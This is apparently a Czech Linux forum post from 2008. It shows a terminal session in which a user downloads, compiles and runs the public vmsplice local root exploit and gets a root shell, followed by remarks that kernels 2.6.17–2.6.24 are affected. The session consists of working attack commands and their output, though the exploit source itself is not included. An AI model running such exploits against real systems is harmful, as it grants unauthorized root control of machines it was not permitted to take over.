xsoft
 Admin
Založen: 25.07.2004 |
Příspěvky: 4714 |
Bydliště: Praha, Hostomice |
|
Zaslal: pá, 15.únor 2008, 14:51 |
|
 |
 |
jenda@yakumo:~$ uname -a
Linux yakumo 2.6.18-5-486 #1 Mon Dec 24 16:04:42 UTC 2007 i586 GNU/Linux
jenda@yakumo:~$ id
uid=1000(jenda) gid=1000(jenda) skupiny=20(dialout),24(cdrom),25(floppy),29(audio),44(video),46(plugdev),1000(jenda)
jenda@yakumo:~$ whoami
jenda
jenda@yakumo:~$ wget -nv http://www.securityfocus.com/data/vulnerabilities/exploits/27704.c
13:13:30 URL:http://downloads.securityfocus.com/vulnerabilities/exploits/27704.c [6264/6264] -> "27704.c" [1]
jenda@yakumo:~$ gcc 27704.c
jenda@yakumo:~$ ./a.out
-----------------------------------
Linux vmsplice Local Root Exploit
By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7da9000 .. 0xb7ddb000
[+] root
root@yakumo:~# id
uid=0(root) gid=0(root) skupiny=20(dialout),24(cdrom),25(floppy),29(audio),44(video),46(plugdev),1000(jenda)
root@yakumo:~# whoami
root
root@yakumo:~#
|
Celkem sranda ne?
Je na to kernel 2.6.17 - 2.6.24
http://jenda.blog.root.cz/0802/straslivy-exploit-na-2-6-17-2-6-24
Na cem jeden ITTG2 AC? Na 2.6.12-rc3 ?
|
|